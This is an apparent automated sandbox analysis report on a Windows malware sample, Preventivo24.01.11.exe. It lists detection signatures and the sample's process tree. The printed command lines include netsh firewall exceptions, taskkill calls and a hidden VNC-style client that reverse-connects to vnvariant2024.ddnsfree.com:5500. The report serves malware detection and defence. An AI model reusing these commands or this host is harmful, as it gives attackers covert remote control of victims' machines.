Edit tour
Windows
Analysis Report
Preventivo24.01.11.exe
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains VNC / remote desktop functionality (version string found)
Contains functionalty to change the wallpaper
Modifies the windows firewall
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- Preventivo24.01.11.exe (PID: 5924 cmdline:
C:\Users\u ser\Deskto p\Preventi vo24.01.11 .exe MD5: 32F35B78A3DC5949CE3C99F2981DEF6B) - msiexec.exe (PID: 7216 cmdline:
C:\Windows \system32\ msiexec.ex e" /i "C:\ Users\user \AppData\R oaming\Pho to and Fax Vn\Photo and vn 1.1 .2\install \F97891C\m ain1.msi" AI_SETUPEX EPATH=C:\U sers\user\ Desktop\Pr eventivo24 .01.11.exe SETUPEXED IR=C:\User s\user\Des ktop\ EXE_ CMD_LINE=" /exenoupda tes /force cleanup /w intime 170 6008514 " AI_EUIMSI= " MD5: 9D09DC1EDA745A5F87553048E57620CF)
- viewer.exe (PID: 7424 cmdline:
C:\Games\v iewer.exe" /HideWind ow "C:\Gam es\cmmc.cm d MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0) - cmd.exe (PID: 7468 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Game s\cmmc.cmd " " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7528 cmdline:
C:\Windows \system32\ cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 7556 cmdline:
C:\Windows \system32\ cmd.exe /c Reg Query "HKLM\SOF TWARE\Micr osoft\Wind ows NT\Cur rentVersio n\NetworkL ist\Profil es" /S /V Descriptio n MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 7576 cmdline:
Reg Query "HKLM\SOFT WARE\Micro soft\Windo ws NT\Curr entVersion \NetworkLi st\Profile s" /S /V D escription MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - WMIC.exe (PID: 7592 cmdline:
wmic proce ss where ( name="task host.exe") get comma ndline MD5: E2DE6500DE1148C7F6027AD50AC8B891) - findstr.exe (PID: 7600 cmdline:
findstr /i "taskhost .exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - Acrobat.exe (PID: 7676 cmdline:
C:\Program Files\Ado be\Acrobat DC\Acroba t\Acrobat. exe" "C:\U sers\user\ AppData\Lo cal\Temp\~ .pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7932 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7212 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 12 --field -trial-han dle=1752,i ,959756348 1280373609 ,107485296 9649225075 9,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - viewer.exe (PID: 7704 cmdline:
C:\Games\v iewer.exe /HideWindo w C:\Games \c.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0) - cmd.exe (PID: 7876 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Game s\c.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mode.com (PID: 8000 cmdline:
Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8) - cmd.exe (PID: 7536 cmdline:
C:\Windows \system32\ cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 7640 cmdline:
C:\Windows \system32\ cmd.exe /c Reg Query "HKLM\SOF TWARE\Micr osoft\Wind ows NT\Cur rentVersio n\NetworkL ist\Profil es" /S /V Descriptio n MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 7804 cmdline:
Reg Query "HKLM\SOFT WARE\Micro soft\Windo ws NT\Curr entVersion \NetworkLi st\Profile s" /S /V D escription MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - cmd.exe (PID: 7628 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ty pe C:\Game s\cmd.txt" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 7804 cmdline:
cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - mode.com (PID: 2840 cmdline:
Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8) - netsh.exe (PID: 2132 cmdline:
netsh fire wall add a llowedprog ram progra m="C:\Game s\taskhost .exe" name ="MyApplic ation" mod e=ENABLE s cope=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF) - netsh.exe (PID: 5924 cmdline:
netsh fire wall add a llowedprog ram progra m="C:\Game s\taskhost .exe" name ="MyApplic atio" mode =ENABLE sc ope=ALL pr ofile=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF) - WMIC.exe (PID: 8216 cmdline:
wmic proce ss where ( name="task host.exe") get comma ndline MD5: E2DE6500DE1148C7F6027AD50AC8B891) - findstr.exe (PID: 8244 cmdline:
findstr /i "taskhost .exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - taskhost.exe (PID: 8488 cmdline:
C:\Games\t askhost.ex e -autorec onnect ID: 5383948 -c onnect vnv ariant2024 .ddnsfree. com:5500 - run MD5: 663FE548A57BBD487144EC8226A7A549) - viewer.exe (PID: 8508 cmdline:
C:\Games\v iewer.exe /HideWindo w C:\Games \once.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0) - cmd.exe (PID: 8600 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Game s\once.cmd " " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8624 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - viewer.exe (PID: 8516 cmdline:
C:\Games\v iewer.exe /HideWindo w C:\Games \cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0) - cmd.exe (PID: 8608 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Game s\cmmc.cmd " " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8632 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8704 cmdline:
C:\Windows \system32\ cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - cmd.exe (PID: 8724 cmdline:
C:\Windows \system32\ cmd.exe /c Reg Query "HKLM\SOF TWARE\Micr osoft\Wind ows NT\Cur rentVersio n\NetworkL ist\Profil es" /S /V Descriptio n MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - reg.exe (PID: 8740 cmdline:
Reg Query "HKLM\SOFT WARE\Micro soft\Windo ws NT\Curr entVersion \NetworkLi st\Profile s" /S /V D escription MD5: CDD462E86EC0F20DE2A1D781928B1B0C) - timeout.exe (PID: 8540 cmdline:
timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - timeout.exe (PID: 8960 cmdline:
timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - timeout.exe (PID: 9108 cmdline:
timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - timeout.exe (PID: 2840 cmdline:
timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - timeout.exe (PID: 8456 cmdline:
timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - timeout.exe (PID: 7800 cmdline:
timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - taskkill.exe (PID: 7968 cmdline:
taskkill / im rundll3 2.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - timeout.exe (PID: 736 cmdline:
timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - taskkill.exe (PID: 888 cmdline:
taskkill / im rundll3 2.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - timeout.exe (PID: 8004 cmdline:
timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) - taskkill.exe (PID: 8400 cmdline:
taskkill / im rundll3 2.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - timeout.exe (PID: 8444 cmdline:
timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
- cleanup
⊘No configs have been found
⊘No yara matches
⊘No Sigma rule has matched
Timestamp: | 192.168.2.593.184.216.3449705802834928 01/23/24-12:07:53.684308 |
SID: | 2834928 |
Source Port: | 49705 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | |||
Source: | File opened: | Jump to behavior |
Source: | Code function: | 0_2_00FE9080 | |
Source: | Code function: | 0_2_00EA5220 | |
Source: | Code function: | 0_2_00FBD700 | |
Source: | Code function: | 0_2_01008B30 | |
Source: | Code function: | 0_2_00FBCDD0 | |
Source: | Code function: | 0_2_00FE3210 | |
Source: | Code function: | 0_2_00F9F570 | |
Source: | Code function: | 0_2_00FF3790 | |
Source: | Code function: | 0_2_00FF3C10 | |
Source: | Code function: | 0_2_00FCBFF0 | |
Source: | Code function: | 41_2_000BEC90 |
Source: | Code function: | 0_2_00FF2400 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Snort IDS: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |